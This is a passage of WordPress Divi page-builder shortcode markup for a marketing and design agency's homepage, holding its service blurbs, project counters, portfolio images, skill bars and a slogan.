header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" 